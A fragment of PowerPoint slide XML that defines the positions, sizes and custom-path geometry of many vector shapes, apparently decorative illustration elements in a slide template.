              <a:off x="2258475" y="570450"/>
              <a:ext cx="1280075" cy="444200"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4947550" y="262775"/>
              <a:ext cx="1147925" cy="384100"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5336025" y="1923725"/>
              <a:ext cx="162400" cy="135350"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="5414" w="6496">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2651725" y="4047575"/>
              <a:ext cx="135375" cy="116250"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="4650" w="5415">
                  <a:moveTo>
                    <a:pt x="2739" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="4650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5414" y="4650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2481375" y="1923725"/>
              <a:ext cx="164025" cy="135350"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="5414" w="6561">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1459250" y="2527125"/>
              <a:ext cx="243625" cy="208425"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="8337" w="9745">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4718275" y="1636825"/>
              <a:ext cx="243625" cy="208900"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4971425" y="1636825"/>
              <a:ext cx="243625" cy="208900"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="8356" w="9745">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6803925" y="2260975"/>
              <a:ext cx="243625" cy="208850"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="8354" w="9745">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5711750" y="2736450"/>
              <a:ext cx="197450" cy="168025"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5789775" y="945725"/>
              <a:ext cx="197425" cy="169225"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="6769" w="7897">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6049275" y="945725"/>
              <a:ext cx="197450" cy="169225"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="6769" w="7898">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3006775" y="4857175"/>
              <a:ext cx="197450" cy="169575"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3264700" y="4857175"/>
              <a:ext cx="197450" cy="169575"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="6783" w="7898">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6307200" y="945725"/>
              <a:ext cx="195850" cy="169225"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3767800" y="836325"/>
              <a:ext cx="197450" cy="168025"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="6721" w="7898">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3505100" y="4547475"/>
              <a:ext cx="287750" cy="207875"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1495875" y="2773900"/>
              <a:ext cx="203800" cy="1459975"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="58399" w="8152">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4119650" y="868550"/>
              <a:ext cx="133750" cy="157250"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="6290" w="535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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5961700" y="1944425"/>
              <a:ext cx="812000" cy="746725"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="29869" w="3248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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="755540" y="1025104"/>
              <a:ext cx="1047660" cy="746725"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="29869" w="3884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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5700600" y="3254725"/>
              <a:ext cx="246800" cy="1534800"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6150075" y="3201275"/>
              <a:ext cx="131675" cy="74175"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6616075" y="3944100"/>
              <a:ext cx="157625" cy="176750"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6299225" y="3275275"/>
              <a:ext cx="313675" cy="328125"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5732450" y="3078000"/>
              <a:ext cx="244700" cy="157625"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6651200" y="3786250"/>
              <a:ext cx="58825" cy="118075"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6007875" y="3155300"/>
              <a:ext cx="121025" cy="59650"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6599900" y="3634350"/>
              <a:ext cx="76675" cy="115525"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="238125" y="2229325"/>
              <a:ext cx="224500" cy="433150"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="17326" w="898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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="417375" y="2847300"/>
              <a:ext cx="91425" cy="108125"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="4325" w="3657">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="360700" y="2701425"/>
              <a:ext cx="71675" cy="113900"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="4556" w="2867">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="379800" y="2081500"/>
              <a:ext cx="80800" cy="112900"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="4516" w="3232">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="516725" y="1740625"/>
              <a:ext cx="222925" cy="222925"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="8917" w="8917">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="451450" y="1948450"/>
              <a:ext cx="90775" cy="104250"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="4170" w="3631">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="504525" y="2977900"/>
              <a:ext cx="231950" cy="235450"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="9418" w="9278">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7060250" y="2937275"/>
              <a:ext cx="87600" cy="107625"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="4305" w="3504">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7136675" y="2790600"/>
              <a:ext cx="71675" cy="115475"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="4619" w="2867">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6832600" y="3069275"/>
              <a:ext cx="226100" cy="234825"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="9393" w="9044">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7108025" y="2320075"/>
              <a:ext cx="222925" cy="434750"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="17390" w="8917">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7025225" y="2038025"/>
              <a:ext cx="92375" cy="105425"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="4217" w="3695">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7111200" y="2171525"/>
              <a:ext cx="78050" cy="113625"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="4545" w="3122">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6829400" y="1831375"/>
              <a:ext cx="222925" cy="222925"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="8917" w="8917">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1369300" y="4886275"/>
              <a:ext cx="322425" cy="328350"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="13134" w="12897">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1849075" y="5273675"/>
              <a:ext cx="130825" cy="60350"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2414" w="5233">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1276025" y="4585150"/>
              <a:ext cx="55875" cy="116800"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="4672" w="2235">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1307975" y="4740050"/>
              <a:ext cx="74875" cy="114750"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="4590" w="2995">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1214075" y="4367600"/>
              <a:ext cx="157625" cy="178325"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="7133" w="6305">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1702125" y="5214500"/>
              <a:ext cx="131300" cy="73350"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2934" w="5252">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2014900" y="5254400"/>
              <a:ext cx="237250" cy="157625"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3619725" y="1871175"/>
              <a:ext cx="240450" cy="240450"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="9618" w="9618">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4411000" y="772625"/>
              <a:ext cx="240425" cy="240450"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4718275" y="772625"/>
              <a:ext cx="240425" cy="240450"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5320100" y="772625"/>
              <a:ext cx="240425" cy="240450"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="9618" w="9617">
                  <a:moveTo>
                    <a:pt x="0" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0"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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1718775" y="4396250"/>
              <a:ext cx="472875" cy="608200"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="24328" w="18915">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1817475" y="4498150"/>
              <a:ext cx="280225" cy="39825"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1817475" y="4574575"/>
              <a:ext cx="280225" cy="39825"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1817475" y="4650975"/>
              <a:ext cx="221325" cy="39850"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1594" w="8853">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8853" y="1593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6358150" y="2643350"/>
              <a:ext cx="401225" cy="445825"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3627700" y="319425"/>
              <a:ext cx="525400" cy="450050"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3778950" y="401675"/>
              <a:ext cx="101900" cy="235650"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2650150" y="1654650"/>
              <a:ext cx="173550" cy="173575"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="6943" w="6942">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1094650" y="26911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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1723550" y="1665800"/>
              <a:ext cx="151275" cy="151275"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="6051" w="6051">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6334250" y="436700"/>
              <a:ext cx="149700" cy="151275"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6866025" y="2581250"/>
              <a:ext cx="149675" cy="151275"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="6051" w="5987">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1094650" y="29713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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2409725" y="1654650"/>
              <a:ext cx="171975" cy="173575"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4450800" y="4440825"/>
              <a:ext cx="1246650" cy="250000"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="10000" w="49866">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3118225" y="1673750"/>
              <a:ext cx="1514100" cy="135375"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1349400" y="323650"/>
              <a:ext cx="2101600" cy="616175"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="24647" w="84064">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5823200" y="713725"/>
              <a:ext cx="843825" cy="1111300"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="924300" y="661175"/>
              <a:ext cx="135350" cy="314875"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="12595" w="5414">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1782450" y="3907475"/>
              <a:ext cx="135350" cy="315250"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="12610" w="5414">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1113775" y="661175"/>
              <a:ext cx="133750" cy="314875"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="12595" w="535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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1782450" y="2181650"/>
              <a:ext cx="135350" cy="1668525"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="66741" w="5414">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5576425" y="4885025"/>
              <a:ext cx="1047625" cy="159225"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5523875" y="5074475"/>
              <a:ext cx="1100175" cy="157650"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="6306" w="44007">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2408625" y="5020350"/>
              <a:ext cx="1230225" cy="393850"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="819225" y="2831225"/>
              <a:ext cx="197450" cy="168025"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="6721" w="7898">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="860625" y="1842525"/>
              <a:ext cx="619350" cy="135350"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="5414" w="24774">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6060425" y="4273650"/>
              <a:ext cx="627300" cy="495175"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="19807" w="25092">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6033350" y="2694300"/>
              <a:ext cx="97150" cy="98725"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="3949" w="3886">
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="3949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3885" y="3949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6162325" y="2694300"/>
              <a:ext cx="98725" cy="98725"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="3949" w="3949">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="3949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948" y="3949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6033350" y="2820075"/>
              <a:ext cx="97150" cy="98725"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="3949" w="3886">
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="3949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3885" y="3949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6162325" y="2820075"/>
              <a:ext cx="98725" cy="98725"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="3949" w="3949">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="3949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948" y="3949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6076350" y="3681400"/>
              <a:ext cx="176750" cy="455375"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6270575" y="3679800"/>
              <a:ext cx="178350" cy="456975"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6170275" y="3772150"/>
              <a:ext cx="184700" cy="116250"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6132075" y="3928175"/>
              <a:ext cx="261125" cy="208600"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="8344" w="10445">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6262625" y="3928175"/>
              <a:ext cx="25" cy="25"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6036550" y="3628850"/>
              <a:ext cx="447400" cy="39825"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6036550" y="4149475"/>
              <a:ext cx="447400" cy="39825"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6163900" y="2121150"/>
              <a:ext cx="122575" cy="176750"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="7070" w="4903">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
